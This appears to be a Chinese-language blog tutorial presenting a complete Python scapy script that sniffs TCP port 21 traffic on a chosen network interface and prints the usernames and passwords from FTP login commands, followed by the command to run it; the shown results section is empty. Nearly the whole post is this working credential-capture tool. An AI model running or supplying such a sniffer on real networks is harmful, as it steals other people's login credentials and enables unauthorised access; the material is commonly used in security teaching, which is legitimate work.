python绝技 — 嗅探FTP登录口令

 

代码：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @ Author: ssooking
# @ Blog  : www.cnblogs.com/ssooking
# @ Github: https://github.com/ssooking


import optparse
from scapy.all import *

def ftpsniff(pkt):
    dest = pkt.getlayer(IP).dst
    raw = pkt.sprintf('%Raw.load%')
    user = re.findall('(?i)USER (.*)', raw)
    pswd = re.findall('(?i)PASS (.*)', raw)
    if user:
        print '[*] Detected FTP Login to ' + str(dest)
        print '[+] Username: ' + str(user[0])
    elif pswd:
        print '[+] Password: ' + str(pswd[0])

def ftpsniffmain():
    parser = optparse.OptionParser('Usage： python sniffFTP.py '+'-i <interface>')
    parser.add_option('-i',dest='interface',type='string',help='specify interface to listen on')
    (options,args) = parser.parse_args()
    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface
    try:
        print 'FTP sniffer is running....'
        sniff(filter='tcp port 21',prn=ftpsniff)
    except KeyboardInterrupt:
        exit(0)


if __name__ == '__main__':
    ftpsniffmain()

 

运行嗅探脚本： sudo python ftpsniff.py -i wlan0

现在我们登录ftp进行测试

嗅探结果